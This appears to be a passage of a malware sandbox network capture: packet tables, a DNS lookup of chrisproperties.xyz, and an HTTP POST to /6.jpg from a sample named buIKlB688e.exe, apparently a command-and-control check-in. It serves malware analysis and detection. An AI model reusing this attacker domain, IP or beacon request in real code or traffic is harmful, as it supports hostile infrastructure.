Oct 12, 2021 12:35:38.990154982 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.992676973 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.992775917 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.992804050 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.992827892 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.992839098 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.992851019 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.992898941 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.992904902 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.992959023 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.992983103 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993006945 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993024111 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.993031979 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993056059 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993078947 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993094921 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.993105888 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993132114 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993155956 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993171930 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.993180037 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993195057 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.993204117 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993227005 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993305922 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.993381977 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993407965 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993429899 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993447065 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.993448973 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993475914 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993499041 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993510962 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.993521929 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993545055 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993571043 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993596077 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993616104 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.993618965 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993640900 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993664980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993681908 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.993690014 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993712902 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993727922 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.993736982 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993763924 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993788004 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993812084 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993819952 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.993834972 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993849039 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.993859053 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993880987 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993900061 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993923903 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.993952990 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993979931 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.993997097 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994004965 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994024038 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994041920 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994050026 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994062901 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994086981 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994102001 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994110107 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994136095 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994160891 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994177103 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994184017 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994208097 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994230032 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994252920 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994254112 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994281054 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994290113 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994304895 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994327068 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994352102 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994360924 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994375944 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994402885 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994415998 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994427919 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994451046 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994451046 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994472980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994504929 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994519949 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994529009 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994551897 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994576931 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994591951 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994601011 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994621992 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994626045 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994648933 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994663000 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994676113 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994700909 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994724035 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994740009 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994748116 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994771957 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994795084 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994815111 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994818926 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994843006 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994869947 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994882107 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994895935 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994919062 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994935036 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994942904 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994967937 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.994981050 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.994991064 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.995016098 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.995038986 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.995054007 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.995065928 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.995090961 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.995107889 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.995136023 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.995178938 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.995238066 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.995265007 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.995291948 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.995315075 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.995341063 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.995585918 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.023413897 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.023453951 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.023473024 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.023494959 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.023521900 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.023545980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.023569107 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.023591995 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.023613930 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.023634911 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.023655891 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.023678064 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.023700953 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.023726940 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.024044037 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.024071932 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.024075031 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.027457952 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.027497053 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.027513027 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.027534008 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.027554989 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.028970003 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.028990030 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.029026031 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.029057980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.029581070 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.029633045 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.030260086 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.034401894 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.034442902 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.034461975 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.034478903 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.034498930 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.034606934 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.034629107 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.037653923 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.437364101 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.437396049 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.823961973 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.850475073 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.850517035 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.850550890 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.850580931 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.850606918 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.850634098 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.850661039 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.850686073 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.850701094 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.850716114 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.850742102 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.850745916 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.850754976 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.850761890 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.850769043 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.850775003 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.850800037 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.850805998 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.850826979 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.850857973 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.876600981 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876636982 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876662016 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876684904 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876705885 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876724958 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876745939 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876770020 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876782894 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.876789093 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876811981 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876830101 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.876832008 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876851082 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876857042 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.876868010 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876878977 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.876885891 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876904011 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876913071 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.876926899 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876946926 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.876952887 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876971960 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.876972914 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.876990080 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.877007008 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.877013922 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.877054930 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.877135038 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.877152920 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.877183914 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.877221107 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.877269030 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.877288103 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.877337933 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.904445887 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904479980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904504061 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904526949 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904551029 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904558897 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.904575109 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904601097 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904607058 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.904625893 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904633999 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.904644966 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904660940 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904675007 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.904676914 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904691935 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904707909 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904716969 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.904723883 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904737949 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.904742956 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904759884 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904764891 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.904776096 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904783964 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.904793024 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904808044 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904814959 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.904823065 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904838085 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904853106 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904853106 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.904871941 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904881001 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.904889107 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904903889 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904913902 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.904922009 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904937983 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:39.904962063 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.904967070 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:39.904993057 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:40.512995005 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:40.578943968 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:40.645077944 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:40.645178080 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:41.066500902 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:41.066726923 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:41.092783928 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.092864037 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.092928886 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:41.092979908 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:41.093044996 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.093184948 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:41.120279074 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.120393038 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:41.121289015 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.121381044 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:41.124242067 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.124264956 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.124279976 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.124293089 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.124306917 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.124455929 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:41.146116972 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.147090912 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.147109985 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.151550055 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.151568890 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.151575089 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.151586056 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.151598930 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.151608944 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.151616096 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.151627064 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.196186066 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:41.196643114 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:44.022110939 CEST	49749	80	192.168.2.6	195.133.18.140

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2021 12:35:34.239654064 CEST	49283	53	192.168.2.6	8.8.8.8
Oct 12, 2021 12:35:34.258331060 CEST	53	49283	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 12, 2021 12:35:34.239654064 CEST	192.168.2.6	8.8.8.8	0x31e2	Standard query (0)	chrisproperties.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 12, 2021 12:35:34.258331060 CEST	8.8.8.8	192.168.2.6	0x31e2	No error (0)	chrisproperties.xyz		195.133.18.140	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

chrisproperties.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49749	195.133.18.140	80	C:\Users\user\Desktop\buIKlB688e.exe

Timestamp	kBytes transferred	Direction	Data
Oct 12, 2021 12:35:34.345733881 CEST	1110	OUT	POST /6.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: chrisproperties.xyz Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
